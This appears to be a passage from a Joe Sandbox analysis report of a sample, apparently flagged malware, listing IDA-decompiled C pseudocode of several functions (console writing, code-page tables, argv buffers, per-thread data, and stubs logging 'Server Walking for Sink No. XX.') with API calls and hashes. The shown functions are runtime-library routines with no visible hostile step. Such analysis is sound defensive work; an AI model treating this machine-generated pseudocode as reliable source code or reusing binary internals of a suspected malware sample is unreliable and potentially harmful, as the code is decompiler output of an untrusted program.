                      				_t13 = WriteConsoleW( *0xa068e0, _a4, _a8, _a12, 0);
                      				if(_t13 == 0 && GetLastError() == 6) {
                      					L009CCFF4();
                      					E009CCFB6();
                      					_t13 = WriteConsoleW( *0xa068e0, _a4, _a8, _a12, _t13);
                      				}
                      				return _t13;
                      			}





                      APIs
                      • WriteConsoleW.KERNEL32(009C3E47,?,?,00000000,?,?,009C9737,009C3E47,00000001,?,?,?,009C3E47,?), ref: 009CD022
                      • GetLastError.KERNEL32(?,?,009C9737,009C3E47,00000001,?,?,?,009C3E47,?,?,?,?,009C4B29,?,?), ref: 009CD02E
                        • Part of subcall function 009CCFF4: CloseHandle.KERNEL32(FFFFFFFE,009CD03E,?,?,009C9737,009C3E47,00000001,?,?,?,009C3E47,?,?,?,?,009C4B29), ref: 009CD004
                      • ___initconout.LIBCMT ref: 009CD03E
                        • Part of subcall function 009CCFB6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,009CCFE5,009C9724,?,?,009C3E47,?), ref: 009CCFC9
                      • WriteConsoleW.KERNEL32(009C3E47,?,?,00000000,?,?,009C9737,009C3E47,00000001,?,?,?,009C3E47,?), ref: 009CD053
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: 6cb1630f476c28832922e8a230b1ab9cd6626621dfe1fb79ea0630318fca9742
                      • Instruction ID: d54404ef58443d27540c663381190ee96c52515b919e5990517c18274bb13e76
                      • Opcode Fuzzy Hash: 6cb1630f476c28832922e8a230b1ab9cd6626621dfe1fb79ea0630318fca9742
                      • Instruction Fuzzy Hash: B6F01C36841128BBCF226FD5DC04F9A3F66EB493A1F05801AFE0995121D632C861EB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E009AF5F0(void* __edi, signed int _a4) {
                      				signed int _v8;
                      				char _v264;
                      				char _v520;
                      				char _v776;
                      				char _v1800;
                      				struct _cpinfo _v1820;
                      				signed int _v1824;
                      				signed int _v1828;
                      				signed int _t121;
                      				signed int _t149;
                      				signed int _t151;
                      				void* _t153;
                      				signed int _t157;
                      				signed int _t173;
                      				signed int _t175;
                      				signed int _t182;
                      				signed int _t201;
                      				signed int _t209;
                      				void* _t211;
                      				void* _t212;
                      				signed int _t214;
                      				signed int _t216;
                      
                      				_t211 = __edi;
                      				_t214 = _t216;
                      				_t121 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t121 ^ _t214;
                      				_t123 = _a4;
                      				if( *(_a4 + 4) == 0xfde9) {
                      					L26:
                      					_v1824 = 0;
                      					while(1) {
                      						__eflags = _v1824 - 0x100;
                      						if(_v1824 >= 0x100) {
                      							goto L37;
                      						}
                      						__eflags = _v1824 - 0x41;
                      						if(_v1824 < 0x41) {
                      							L32:
                      							__eflags = _v1824 - 0x61;
                      							if(_v1824 < 0x61) {
                      								L35:
                      								_t123 = _a4 + _v1824;
                      								__eflags = _t123;
                      								 *((char*)(_t123 + 0x119)) = 0;
                      							} else {
                      								__eflags = _v1824 - 0x7a;
                      								if(_v1824 > 0x7a) {
                      									goto L35;
                      								} else {
                      									_t123 = _a4 + _v1824;
                      									 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000020;
                      									_t187 = _a4 + _v1824;
                      									 *((char*)(_a4 + _v1824 + 0x119)) = _v1824 - 0x20;
                      								}
                      							}
                      						} else {
                      							__eflags = _v1824 - 0x5a;
                      							if(_v1824 > 0x5a) {
                      								goto L32;
                      							} else {
                      								 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000010;
                      								_t187 = _v1824 + 0x20;
                      								_t123 = _a4 + _v1824;
                      								 *((char*)(_a4 + _v1824 + 0x119)) = _v1824 + 0x20;
                      							}
                      						}
                      						_t157 = _v1824 + 1;
                      						__eflags = _t157;
                      						_v1824 = _t157;
                      					}
                      				} else {
                      					_t187 = _a4;
                      					if(GetCPInfo( *(_a4 + 4),  &_v1820) == 0) {
                      						goto L26;
                      					} else {
                      						_v1824 = 0;
                      						while(_v1824 < 0x100) {
                      							 *((char*)(_t214 + _v1824 - 0x104)) = _v1824;
                      							_v1824 = _v1824 + 1;
                      						}
                      						 *((char*)(_t214 + 0xfffffffffffffefc)) = 0x20;
                      						_v1828 = _t214 + 0xfffffffffffff8ee;
                      						while(1) {
                      							__eflags =  *_v1828 & 0x000000ff;
                      							if(__eflags == 0) {
                      								break;
                      							}
                      							_v1824 =  *_v1828 & 0x000000ff;
                      							while(1) {
                      								_t149 = _v1828;
                      								__eflags = _v1824 - ( *(_t149 + 1) & 0x000000ff);
                      								if(_v1824 > ( *(_t149 + 1) & 0x000000ff)) {
                      									break;
                      								}
                      								__eflags = _v1824 - 0x100;
                      								if(_v1824 < 0x100) {
                      									 *((char*)(_t214 + _v1824 - 0x104)) = 0x20;
                      									_t209 = _v1824 + 1;
                      									__eflags = _t209;
                      									_v1824 = _t209;
                      									continue;
                      								}
                      								break;
                      							}
                      							_t151 = _v1828 + 2;
                      							__eflags = _t151;
                      							_v1828 = _t151;
                      						}
                      						E009B5170(_t153, _t211, _t212, __eflags, 0, 1,  &_v264, 0x100,  &_v1800,  *(_a4 + 4), 0);
                      						E009B8FB0(_t153, _t212, 0,  *((intOrPtr*)(_a4 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_a4 + 4), 0);
                      						_t187 = _a4;
                      						_t123 = E009B8FB0(_t153, _t212, 0,  *((intOrPtr*)(_a4 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_a4 + 4), 0);
                      						_v1824 = 0;
                      						while(1) {
                      							__eflags = _v1824 - 0x100;
                      							if(_v1824 >= 0x100) {
                      								break;
                      							}
                      							_t201 = _v1824;
                      							__eflags =  *(_t214 + _t201 * 2 - 0x704) & 1;
                      							if(( *(_t214 + _t201 * 2 - 0x704) & 1) == 0) {
                      								_t173 = _v1824;
                      								_t187 =  *(_t214 + _t173 * 2 - 0x704) & 2;
                      								__eflags =  *(_t214 + _t173 * 2 - 0x704) & 2;
                      								if(( *(_t214 + _t173 * 2 - 0x704) & 2) == 0) {
                      									_t123 = _a4 + _v1824;
                      									__eflags = _t123;
                      									 *((char*)(_t123 + 0x119)) = 0;
                      								} else {
                      									 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000020;
                      									_t123 = _a4 + _v1824;
                      									_t182 = _v1824;
                      									_t187 =  *((intOrPtr*)(_t214 + _t182 - 0x304));
                      									 *((char*)(_a4 + _v1824 + 0x119)) =  *((intOrPtr*)(_t214 + _t182 - 0x304));
                      								}
                      							} else {
                      								 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000010;
                      								_t187 = _v1824;
                      								_t123 =  *((intOrPtr*)(_t214 + _t187 - 0x204));
                      								 *((char*)(_a4 + _v1824 + 0x119)) =  *((intOrPtr*)(_t214 + _t187 - 0x204));
                      							}
                      							_t175 = _v1824 + 1;
                      							__eflags = _t175;
                      							_v1824 = _t175;
                      						}
                      					}
                      				}
                      				L37:
                      				__eflags = _v8 ^ _t214;
                      				return E00957280(_t123, _t153, _v8 ^ _t214, _t187, _t211, _t212);
                      			}

                      APIs
                      • GetCPInfo.KERNEL32(0000FDE9,?), ref: 009AF623
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Info
                      • String ID: $z
                      • API String ID: 1807457897-2251613814
                      • Opcode ID: ac633119ef9944fa52af1b2d8bf642353c6d31f7a1aefda698848341687f0213
                      • Instruction ID: 05c0fabfb6d923d11bc575911c449325f1339ddf0942a591edbe0e1d19bd367e
                      • Opcode Fuzzy Hash: ac633119ef9944fa52af1b2d8bf642353c6d31f7a1aefda698848341687f0213
                      • Instruction Fuzzy Hash: 52A13E74E4825C9FDB25CF88C891BE9BB75EF45304F1481E9D94D5B282C278AA92CFD0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009AEB30(intOrPtr* __ecx, void* __edi) {
                      				intOrPtr* _v8;
                      				char _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				char _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _t49;
                      				intOrPtr _t78;
                      
                      				_v8 = __ecx;
                      				_t49 = _v8;
                      				_t78 = _v8;
                      				_t4 = _t49 + 4; // 0x7400f87d
                      				_t5 = _t78 + 8; // 0x8b026a13
                      				if( *_t4 ==  *_t5) {
                      					if( *_v8 != 0) {
                      						_t20 = _v8 + 8; // 0x8b026a13
                      						_v16 =  *_t20 -  *_v8 >> 2;
                      						if(_v16 <= 0x7fffffff) {
                      							_v20 = _v16 << 1;
                      							if((E0099C099(E0099B480( &_v12, E009997D0(_v20, __edi,  *_v8, _v20, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x67)),  &_v12) & 0x000000ff) != 0) {
                      								 *_v8 = E0099B610( &_v12);
                      								 *((intOrPtr*)(_v8 + 4)) =  *_v8 + _v16 * 4;
                      								 *((intOrPtr*)(_v8 + 8)) =  *_v8 + _v20 * 4;
                      								_v32 = 0;
                      								E0099B4E0( &_v12);
                      								return _v32;
                      							}
                      							_v28 = 0xc;
                      							E0099B4E0( &_v12);
                      							return _v28;
                      						}
                      						return 0xc;
                      					}
                      					_v36 = 4;
                      					 *_v8 = E0099B610(E0099B480( &_v24, L009992C0(_t78, __edi, 4, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x57)));
                      					E0099B4E0( &_v24);
                      					if( *_v8 != 0) {
                      						 *((intOrPtr*)(_v8 + 4)) =  *_v8;
                      						 *((intOrPtr*)(_v8 + 8)) =  *_v8 + 0x10;
                      						return 0;
                      					}
                      					return 0xc;
                      				}
                      				return 0;
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009AEB78
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 009AEB61, 009AEBF6
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
                      • API String ID: 4219598475-2801755846
                      • Opcode ID: 83c4a21f7d737717e169441b30c834a69827992a25a46a7701de27d78c53933f
                      • Instruction ID: d089f62099d3c6202b4597e48679692c306d62f62eca216700a9802b464236aa
                      • Opcode Fuzzy Hash: 83c4a21f7d737717e169441b30c834a69827992a25a46a7701de27d78c53933f
                      • Instruction Fuzzy Hash: E3413874A00109EFDF14DF98C981EAEB7B5EF85304F208598E516AB395DB34AE41DF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0095C690(void* __edi) {
                      				char _v8;
                      				char _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _t32;
                      				intOrPtr _t45;
                      				intOrPtr _t70;
                      				intOrPtr _t77;
                      
                      				if( *0xa06020 != 0xffffffff) {
                      					E0095C490( &_v12);
                      					_t32 =  *0xa06020; // 0x5
                      					_v16 = E0096B300(_t32);
                      					if(_v16 != 0xffffffff) {
                      						if(_v16 == 0) {
                      							_t77 =  *0xa06020; // 0x5
                      							if(E0096B340(_t77, 0xffffffff) != 0) {
                      								E0095C470( &_v8, L009992C0( &_v12, __edi, 1, 0x28, 2, "d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\internal\\per_thread_data.cpp", 0x80));
                      								if((E0095C4F0( &_v8) & 0x000000ff) != 0) {
                      									if((E0095C5B0(E0095C540( &_v8)) & 0x000000ff) != 0) {
                      										_v40 = E0095C510( &_v8);
                      										E0095C4B0( &_v8);
                      										E0095C4D0( &_v12);
                      										return _v40;
                      									}
                      									_t45 =  *0xa06020; // 0x5
                      									E0096B340(_t45, 0);
                      									_v36 = 0;
                      									E0095C4B0( &_v8);
                      									E0095C4D0( &_v12);
                      									return _v36;
                      								}
                      								_t70 =  *0xa06020; // 0x5
                      								E0096B340(_t70, 0);
                      								_v32 = 0;
                      								E0095C4B0( &_v8);
                      								E0095C4D0( &_v12);
                      								return _v32;
                      							}
                      							_v28 = 0;
                      							E0095C4D0( &_v12);
                      							return _v28;
                      						}
                      						_v24 = _v16;
                      						E0095C4D0( &_v12);
                      						return _v24;
                      					}
                      					_v20 = 0;
                      					E0095C4D0( &_v12);
                      					return _v20;
                      				}
                      				return 0;
                      			}

                      Strings
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp, xrefs: 0095C729
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
                      • API String ID: 0-1094830976
                      • Opcode ID: 31d87831dd84da36a741ba5c6ec91d06437f22f4638cc0ee4ce72e98880a5cbf
                      • Instruction ID: e7658cfe9b3fb98c5745acad9cf9a5ee2ec97a7769cd069a8aec95dc61609e8d
                      • Opcode Fuzzy Hash: 31d87831dd84da36a741ba5c6ec91d06437f22f4638cc0ee4ce72e98880a5cbf
                      • Instruction Fuzzy Hash: 913140F0D40309AFCB04EFA6D852FFE7774AF5430AF504194E81166291EB74AB09CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E009D0840(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _v8;
                      				char _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				char _v144;
                      				char _v156;
                      				void _v164;
                      				signed int _t26;
                      				signed int _t27;
                      				void* _t33;
                      				void* _t38;
                      				intOrPtr _t45;
                      				void* _t56;
                      				void* _t59;
                      				void* _t63;
                      				signed int _t65;
                      				void* _t66;
                      
                      				_t56 = __edx;
                      				_push(0xffffffff);
                      				_push(0x9d5680);
                      				_push( *[fs:0x0]);
                      				_push(__edi);
                      				_push(__ecx);
                      				memset( &_v164, 0xcccccccc, 0x25 << 2);
                      				_pop(_t45);
                      				_t26 =  *0xa0600c; // 0x5d529087
                      				_t27 = _t26 ^ _t65;
                      				_v20 = _t27;
                      				 *[fs:0x0] =  &_v16;
                      				_v24 = _t45;
                      				_v28 = 0;
                      				_v32 = E00941AB0();
                      				_v36 = 0;
                      				_v40 = 0;
                      				E00992DE0( &_v144, 0x64, "Server Walking for Sink No. XX.");
                      				E00954B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
                      				_v8 = 0;
                      				_t33 = L00942F30( &_v156);
                      				_t16 = _v24 + 0x24; // 0xf0000ff
                      				E00955CB0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
                      				_v164 = 1;
                      				_v8 = 0xffffffff;
                      				E009430B0( &_v156, __esi);
                      				_push(_v24);
                      				_push(_v164);
                      				E009D14C0(_t65, 0x9d0944);
                      				_pop(_t38);
                      				_pop(_t59);
                      				 *[fs:0x0] = _v16;
                      				_t63 = _t27;
                      				return E009D1520(E00957280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
                      			}

                      APIs
                      • __aligned_msize.LIBCMTD ref: 009D08AE
                        • Part of subcall function 00955CB0: VariantInit.OLEAUT32(?), ref: 00955DA4
                        • Part of subcall function 009430B0: SysFreeString.OLEAUT32 ref: 009430C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009D0912
                        • Part of subcall function 009D14C0: _RTC_StackFailure.LIBCMTD ref: 009D1501
                      Strings
                      • Server Walking for Sink No. XX., xrefs: 009D08A0
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Walking for Sink No. XX.
                      • API String ID: 2532982526-2197370697
                      • Opcode ID: 592984c112f73af30217cf19cb6286e1a8e5909350734e41ccc143eb43e0cf80
                      • Instruction ID: a2d2f1c893c037371a2ffae1d461422cc7d7af16da1bd4aa21555af04eaa325e
                      • Opcode Fuzzy Hash: 592984c112f73af30217cf19cb6286e1a8e5909350734e41ccc143eb43e0cf80
                      • Instruction Fuzzy Hash: 5421A172E002089FDB10DFA4DC51BEEB7B4FB84314F40826AE519A73C1DB755A48CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E009D0980(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _v8;
                      				char _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				char _v144;
                      				char _v156;
                      				void _v164;
                      				signed int _t26;
                      				signed int _t27;
                      				void* _t33;
                      				void* _t38;
                      				intOrPtr _t45;
                      				void* _t56;
                      				void* _t59;
                      				void* _t63;
                      				signed int _t65;
                      				void* _t66;
                      
                      				_t56 = __edx;
                      				_push(0xffffffff);
                      				_push(0x9d56ba);
                      				_push( *[fs:0x0]);
                      				_push(__edi);
                      				_push(__ecx);
                      				memset( &_v164, 0xcccccccc, 0x25 << 2);
                      				_pop(_t45);
                      				_t26 =  *0xa0600c; // 0x5d529087
                      				_t27 = _t26 ^ _t65;
                      				_v20 = _t27;
                      				 *[fs:0x0] =  &_v16;
                      				_v24 = _t45;
                      				_v28 = 0;
                      				_v32 = E00941AB0();
                      				_v36 = 0;
                      				_v40 = 0;
                      				E00992DE0( &_v144, 0x64, "Server Paddling for Sink No. XX.");
                      				E00954B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
                      				_v8 = 0;
                      				_t33 = L00942F30( &_v156);
                      				_t16 = _v24 + 0x24; // 0xff9bc2e8
                      				E00955AB0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
                      				_v164 = 1;
                      				_v8 = 0xffffffff;
                      				E009430B0( &_v156, __esi);
                      				_push(_v24);
                      				_push(_v164);
                      				E009D14C0(_t65, 0x9d0a84);
                      				_pop(_t38);
                      				_pop(_t59);
                      				 *[fs:0x0] = _v16;
                      				_t63 = _t27;
                      				return E009D1520(E00957280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
                      			}

                      APIs
                      • __aligned_msize.LIBCMTD ref: 009D09EE
                        • Part of subcall function 00955AB0: VariantInit.OLEAUT32(?), ref: 00955BA4
                        • Part of subcall function 009430B0: SysFreeString.OLEAUT32 ref: 009430C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009D0A52
                        • Part of subcall function 009D14C0: _RTC_StackFailure.LIBCMTD ref: 009D1501
                      Strings
                      • Server Paddling for Sink No. XX., xrefs: 009D09E0
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Paddling for Sink No. XX.
                      • API String ID: 2532982526-3374743945
                      • Opcode ID: 9671f9d7fe6c2611ef6e8027d10c6c0d4dbde615cf4e24dde4492722f423ea18
                      • Instruction ID: 728c2c1d85d5e5626c03e85de06f2a43eeb2e810a589f47229987bc3fbeb9648
                      • Opcode Fuzzy Hash: 9671f9d7fe6c2611ef6e8027d10c6c0d4dbde615cf4e24dde4492722f423ea18
                      • Instruction Fuzzy Hash: 3521A1B2E042089FDB10DF94DC51BAEB7B4FB88314F40826AE419A7381DB755A48CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E009D0AC0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _v8;
                      				char _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				char _v144;
                      				char _v156;
                      				void _v164;
                      				signed int _t26;
                      				signed int _t27;
                      				void* _t33;
                      				void* _t38;
                      				intOrPtr _t45;
                      				void* _t56;
                      				void* _t59;
                      				void* _t63;
                      				signed int _t65;
                      				void* _t66;
                      
                      				_t56 = __edx;
                      				_push(0xffffffff);
                      				_push(0x9d56f4);
                      				_push( *[fs:0x0]);
                      				_push(__edi);
                      				_push(__ecx);
                      				memset( &_v164, 0xcccccccc, 0x25 << 2);
                      				_pop(_t45);
                      				_t26 =  *0xa0600c; // 0x5d529087
                      				_t27 = _t26 ^ _t65;
                      				_v20 = _t27;
                      				 *[fs:0x0] =  &_v16;
                      				_v24 = _t45;
                      				_v28 = 0;
                      				_v32 = E00941AB0();
                      				_v36 = 0;
                      				_v40 = 0;
                      				E00992DE0( &_v144, 0x64, "Server Flapping for Sink No. XX.");
                      				E00954B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
                      				_v8 = 0;
                      				_t33 = L00942F30( &_v156);
                      				_t16 = _v24 + 0x24; // 0xb70f0000
                      				E009558B0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
                      				_v164 = 1;
                      				_v8 = 0xffffffff;
                      				E009430B0( &_v156, __esi);
                      				_push(_v24);
                      				_push(_v164);
                      				E009D14C0(_t65, 0x9d0bc4);
                      				_pop(_t38);
                      				_pop(_t59);
                      				 *[fs:0x0] = _v16;
                      				_t63 = _t27;
                      				return E009D1520(E00957280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
                      			}

                      APIs
                      • __aligned_msize.LIBCMTD ref: 009D0B2E
                        • Part of subcall function 009558B0: VariantInit.OLEAUT32(?), ref: 009559A4
                        • Part of subcall function 009430B0: SysFreeString.OLEAUT32 ref: 009430C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009D0B92
                        • Part of subcall function 009D14C0: _RTC_StackFailure.LIBCMTD ref: 009D1501
                      Strings
                      • Server Flapping for Sink No. XX., xrefs: 009D0B20
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Flapping for Sink No. XX.
                      • API String ID: 2532982526-3528622240
